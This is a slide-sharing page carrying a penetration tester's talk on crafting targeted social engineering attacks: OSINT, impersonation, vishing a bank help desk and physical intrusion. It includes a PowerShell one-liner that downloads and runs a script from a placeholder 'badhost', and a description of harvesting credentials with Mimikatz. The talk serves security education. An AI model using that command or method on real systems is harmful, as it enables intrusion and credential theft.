social imagineering
play

SOCIAL IMAGINEERING Hello. Aloha. Hola. Konnichiwa. Ciao. Bonjour. - PowerPoint PPT Presentation

Jul 12, 2023 •195 likes •423 views

SOCIAL IMAGINEERING Hello. Aloha. Hola. Konnichiwa. Ciao. Bonjour. Crafting Targeted Social Engineering Attacks leapsecurity.io @LeapSecurity LEAP SECURITY Confidential. Not to be copied, distributed or reproduced without prior written

  1. SOCIAL IMAGINEERING Hello. Aloha. Hola. Kon’nichiwa. Ciao. Bonjour. Crafting Targeted Social Engineering Attacks leapsecurity.io @LeapSecurity LEAP SECURITY Confidential. Not to be copied, distributed or reproduced without prior written approval.

  2. Ex Experience • Founder of Leap Security Inc. • Security Consultant/Penetration Tester • Forensic Analyst Pu Publica cations • Featured on security magazines • Hackin9, Pentest Magazine, ACAMS Sp Speaker • Conferences across the nation Tools To • InSpy, Pastepwnd, CredCrack @jonathanbroche @LeapSecurity leapsecurity.io // //

  3. Social Engineering @jonathanbroche @LeapSecurity leapsecurity.io // //

  4. Definition • The act of manipulating an individual(s) to obtain X • X is an object or information @jonathanbroche @LeapSecurity leapsecurity.io // //

  5. What’s changed? • Education • Awareness (sorta) • It’s gotten easier for the bad guys too. • Don’t speak English? No problem. • Services to proof read and spell check malicious phishing emails • Not tech savvy? No problem. • Exploit and Ransomware Kits being sold for $500 @jonathanbroche @LeapSecurity leapsecurity.io // //

  6. Attack Methodology Information Gathering Attack Exploitation Preparation @jonathanbroche @LeapSecurity leapsecurity.io // //

  7. Attack Methodology (Cont.) • Information Gathering Information • Google, Bing, Shodan Gathering • Social Media – LinkedIn/Twitter/Facebook • Metadata • Surveillance (Physical Intel) Attack Exploitation Preparation @jonathanbroche @LeapSecurity leapsecurity.io // //

  8. Attack Methodology (Cont.) • OSINT Favorites • HaveIBeenPwn • https://haveibeenpwned.com/ • OSINT Framework • https://osintframework.com/ • Intel Tools • https://inteltechniques.com/ • Dragnet • https://github.com/tevora- threat/Dragnet @jonathanbroche @LeapSecurity leapsecurity.io // //

  9. Pastepwnd Demo https://github.com/leapsecurity/Pastepwnd @jonathanbroche @LeapSecurity leapsecurity.io // //

  10. Attack Methodology (Cont.) • Attack Preparation Information • Get to know your target Gathering • Pick a persona to impersonate • Obtain target email signature • Build, Buy, or Prepare Tools • Spoof Services • Circumvent defensive technologies Attack Exploitation • Entice users with rewards Preparation @jonathanbroche @LeapSecurity leapsecurity.io // //

  11. @jonathanbroche @LeapSecurity leapsecurity.io // //

  12. InSpy Demo https://github.com/leapsecurity/InSpy @jonathanbroche @LeapSecurity leapsecurity.io // //

  13. Attack Methodology (Cont.) • Exploitation Information • Slow and steady Gathering • Lateral movement • Sensitive data or objective • Exfiltration Attack Exploitation Preparation @jonathanbroche @LeapSecurity leapsecurity.io // //

  14. Common Exploit Techniques • HTA – HTML Applications can be embedded on website • Macros • Executables @jonathanbroche @LeapSecurity leapsecurity.io // //

  15. Common Exploit Techniques (Cont.) • PowerShell • IEX (New-Object Net.WebClient). DownloadString ('http://badhost/hackerscript.ps1’) • C# • Visual Basic @jonathanbroche @LeapSecurity leapsecurity.io // //

  16. PS DownloadString functionality example • Logged into workstations via SMB • Use PowerShell script in memory to capture cleartext credentials using Mimikatz (Wdigest) • Until it found a domain administrator account @jonathanbroche @LeapSecurity leapsecurity.io // //

  17. Example: Vishing • Targeted Customer Service Representatives within the Bank • Impersonated contractor working with help desk • Obtained help desk extension • Discovered MobileIron • Called Help Desk and obtained AD account @jonathanbroche @LeapSecurity leapsecurity.io // //

  18. Example: Spear Phishing • Custom website (HTML, CSS, JS, PHP) • Rebrand scenario @jonathanbroche @LeapSecurity leapsecurity.io // //

  19. Example: Physical Test • Cold brrr, no snow brush • Responder, cracked NTLM hashes • Became friends with security guard • Became best friends with employee and got a tour of the facility @jonathanbroche @LeapSecurity leapsecurity.io // //

  20. Closing and Questions @jonathanbroche @LeapSecurity leapsecurity.io // //

  21. Hello. Aloha. Hola. Kon’nichiwa. Ciao. Bonjour. Thank you!!! @jonathanbroche @LeapSecurity leapsecurity.io // // LEAP SECURITY Confidential. Not to be copied, distributed or reproduced without prior written approval.

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Healthcare Re - Imagineering How disruptive technology will help to transform healthcare

Healthcare Re - Imagineering How disruptive technology will help to transform healthcare

Healthcare Re - Imagineering How disruptive technology will help to transform healthcare Agenda Brief Introduction Why data is essential to healthcare delivery transformation What can be done to make the best use of your data ED

269 views • 26 slides
Getting Social What is social media? Why does social media matter? What social media

Getting Social What is social media? Why does social media matter? What social media

pwcom .co.uk CIOB Hertfordshire March 2012 Who am I? Getting Social What is social media? Why does social media matter? What social media tools can we apply in construction? How do we start? Paul Wilkinson

396 views • 18 slides
The role of Social Work in end of life planning What is Social Work? Social work is a

The role of Social Work in end of life planning What is Social Work? Social work is a

The role of Social Work in end of life planning What is Social Work? Social work is a practice-based profession and an academic discipline that facilitates social change and development, social cohesion, and the empowerment and liberation of

348 views • 11 slides
FROM SOCIAL CAPITAL TO SOCIAL MOBILITY: LIMITATIONS AND OPPORTUNITIES OF SOCIAL SUPPORT AND

FROM SOCIAL CAPITAL TO SOCIAL MOBILITY: LIMITATIONS AND OPPORTUNITIES OF SOCIAL SUPPORT AND

FROM SOCIAL CAPITAL TO SOCIAL MOBILITY: LIMITATIONS AND OPPORTUNITIES OF SOCIAL SUPPORT AND SOCIAL LEVRAGE NETWORKS AMONG POOR FEMALE HOUSEHOLD HEADS IN SRI LANKA Kumudika Boyagoda PhD Candidate NIDEA, University of Waikato

262 views • 12 slides
Social Entrepreneurship Caravan Social entrepreneurship aims at solving social problems by

Social Entrepreneurship Caravan Social entrepreneurship aims at solving social problems by

Social Entrepreneurship Caravan Social entrepreneurship aims at solving social problems by developing new services, products or models. Social enterprises generate revenues and have profits while they are working for realizing their social

216 views • 19 slides
Studying Social Policy at Salford What is Social Policy? What is social policy? Society

Studying Social Policy at Salford What is Social Policy? What is social policy? Society

Studying Social Policy at Salford What is Social Policy? What is social policy? Society Politics Social policy seeks to understand the ways in Economy which social issues and government policies impact on peoples well - being A

469 views • 25 slides
Social networking platforms Social media refers to the means of interactions among people in which

Social networking platforms Social media refers to the means of interactions among people in which

4/30/2013 * a)I dont really know what Social Media means b) None (but I know what Social Media means) # c) 1 Social Media Network d) 2 Social Media Networks @Seth Bokser, MD, MPH Associate Clinical Professor, UCSF Medical School e) 3 or

578 views • 8 slides
Social Security: An Overview For the National Academy of Social Insurance Demystifying Social

Social Security: An Overview For the National Academy of Social Insurance Demystifying Social

Social Security: An Overview For the National Academy of Social Insurance Demystifying Social Security: Academy for Interns July 22, 2010 Joni Lavery, Social Science Research Analyst Social Security Administration Office of Retirement Policy,

511 views • 16 slides
SOCIAL PROGRESS INDEX SOCIAL SOCIAL PROGRESS PROGRESS IMPERATIVE IMPERATIVE Social Progress

SOCIAL PROGRESS INDEX SOCIAL SOCIAL PROGRESS PROGRESS IMPERATIVE IMPERATIVE Social Progress

SOCIAL PROGRESS INDEX SOCIAL SOCIAL PROGRESS PROGRESS IMPERATIVE IMPERATIVE Social Progress Index #socialprogress 2 ADVISORY BOARD Judith Rodin Hernando de Soto Michael E. Porter, President, The Rockefeller President, Institute for Chair

429 views • 16 slides
ANNEXES Social Responsibility Comes First 1 SOCIAL RESPONSIBILITY SOCIAL RESPONSIBILITY IS ONE OF

ANNEXES Social Responsibility Comes First 1 SOCIAL RESPONSIBILITY SOCIAL RESPONSIBILITY IS ONE OF

GEOX GROUP - 1Q20 SALES - MAY 7, 2020 ANNEXES Social Responsibility Comes First 1 SOCIAL RESPONSIBILITY SOCIAL RESPONSIBILITY IS ONE OF GEOXS FUNDAMENTAL VALUES AND THE GROUP HAS IMPLEMENTED A NUMBER OF IMPORTANT MEASURES TO PROTECT ITS

513 views • 17 slides
European Social Economy Regions 2019 1 What is Social Economy ? Social economy is an

European Social Economy Regions 2019 1 What is Social Economy ? Social economy is an

European Social Economy Regions 2019 1 What is Social Economy ? Social economy is an important part of the European socio-economic model. It includes a large variety of stakeholders such as cooperatives, foundations, social

668 views • 14 slides
SOCIAL SECURITY: WHAT YOU NEED TO KNOW Topics: What is Social Security? Will Social Security

SOCIAL SECURITY: WHAT YOU NEED TO KNOW Topics: What is Social Security? Will Social Security

SOCIAL SECURITY: WHAT YOU NEED TO KNOW Topics: What is Social Security? Will Social Security Be There For Me? How Do We Earn Credits? Who Can Get Benefits? When Should I Retire? How Do I Apply? What About Medicare? What is Social

578 views • 44 slides
Is a social network users behavior unique? 2 1 8/9/14 Has social data made

Is a social network users behavior unique? 2 1 8/9/14 Has social data made

8/9/14 Social Fingerprinting: Identifying Users of Social Networks by their Data Footprint The University of Tennessee Electrical Engineering and Computer Science Dissertation Defense Denise Koessler Gosnell Is a social network

458 views • 31 slides
Social Studies November 15, 2016 New York States Defined Purpose of Social Studies Social

Social Studies November 15, 2016 New York States Defined Purpose of Social Studies Social

Social Studies November 15, 2016 New York States Defined Purpose of Social Studies Social Studies is intended to promote civic competence through the integrated study of the social sciences and humanities. Within the school program, Social

469 views • 25 slides
What is Social Media? noun: social media ; plural noun: social medias websites and

What is Social Media? noun: social media ; plural noun: social medias websites and

What is Social Media? noun: social media ; plural noun: social medias websites and applications that enable users to create and share content or to participate in social networking. According to Google by the year 2025 all food

498 views • 21 slides
Kids and Social Networking Introduction Kids and Social Networking Social Networking sites play

Kids and Social Networking Introduction Kids and Social Networking Social Networking sites play

Learwood Middle School Parent Handbook Kids and Social Networking Introduction Kids and Social Networking Social Networking sites play an important role in connecting the lives of people. Research has shown that social media is the preferred

542 views • 9 slides
Cyber Security: Social Engineering Mid-America Technology Alliance Wednesday June 18th, 2015

Cyber Security: Social Engineering Mid-America Technology Alliance Wednesday June 18th, 2015

Cyber Security: Social Engineering Mid-America Technology Alliance Wednesday June 18th, 2015 What is Social Engineering? Social engineering, in the context of information security, is the art of manipulating people so they give up

320 views • 10 slides
!= AUTHOR ORIT ITY AUTHOR ORIT ITY LIKING NG AUTHOR ORIT ITY LIKING NG SOCIA

!= AUTHOR ORIT ITY AUTHOR ORIT ITY LIKING NG AUTHOR ORIT ITY LIKING NG SOCIA

!= AUTHOR ORIT ITY AUTHOR ORIT ITY LIKING NG AUTHOR ORIT ITY LIKING NG SOCIA SOCIALPROOF AUTHOR ORIT ITY LIKING NG SOCIA SOCIALPROOF COMMIT ITME MENTAN ANDCONSIS ISTE TENC NCY AUTHOR ORIT ITY LIKING NG RECIPR PROC

1.34k views • 65 slides
A Framework for Conceptualizing Social Engineering Attacks Jose J. Gonzalez Agder University

A Framework for Conceptualizing Social Engineering Attacks Jose J. Gonzalez Agder University

A Framework for Conceptualizing Social Engineering Attacks Jose J. Gonzalez Agder University College, Grimstad, Norway Jose M. Sarriegi, Alazne Gurrutxaga Tecnun (University of Navarra) San Sebastian, Spain CRITIS06, Samos Introduction

537 views • 19 slides
Ken Baldauf Florida State University Observation 1 Web 2.0 - the participatory, social Web,

Ken Baldauf Florida State University Observation 1 Web 2.0 - the participatory, social Web,

Teaching with New Technologies Ken Baldauf Florida State University Observation 1 Web 2.0 - the participatory, social Web, is dramatically changing online life. Social Social Shopping RSS Wiki Social Nets Media Sharing BookMarking

698 views • 22 slides
StealthWare Social Engineering Malware Running malware for Social Engineering and Covert

StealthWare Social Engineering Malware Running malware for Social Engineering and Covert

StealthWare Social Engineering Malware Running malware for Social Engineering and Covert Operations By: Joey Dreijer StealthWare Social Engineering Malware Social Engineering and Covert Operations Introduction Research Security

403 views • 21 slides
Human Error - The Weakest link in CyberSecurity Exceptional IT. Real People. Bigger Purpose.

Human Error - The Weakest link in CyberSecurity Exceptional IT. Real People. Bigger Purpose.

Exceptional IT. Real People. Bigger Purpose. Human Error - The Weakest link in CyberSecurity Exceptional IT. Real People. Bigger Purpose. Exceptional IT. Real People. Bigger Purpose. Why is Human Error the Weakest Link? It is the easiest

230 views • 9 slides
Social Network Privacy W2SP 2010: WEB 2.0 SECURITY AND PRIVACY 2010 Kurt Opsahl Why is privacy

Social Network Privacy W2SP 2010: WEB 2.0 SECURITY AND PRIVACY 2010 Kurt Opsahl Why is privacy

Social Network Privacy W2SP 2010: WEB 2.0 SECURITY AND PRIVACY 2010 Kurt Opsahl Why is privacy important? If one would give me six lines written by the hand of the most honest man, I would find something in them to have him hanged.

725 views • 31 slides
2018 SOCIAL MEDIA BOOTCAMP 2 0 1 8 S O C I A L M E D I A B O O T C A M P AGENDA INDUSTRY

2018 SOCIAL MEDIA BOOTCAMP 2 0 1 8 S O C I A L M E D I A B O O T C A M P AGENDA INDUSTRY

LEE COUNTY VCB 2018 SOCIAL MEDIA BOOTCAMP 2 0 1 8 S O C I A L M E D I A B O O T C A M P AGENDA INDUSTRY TRENDS CONTENT STRATEGY CRISIS COMMUNICATION SOCIAL PLATFORMS TOOLS SOCIAL MEDIA METRICS INSTAGRAM

971 views • 64 slides

More recommend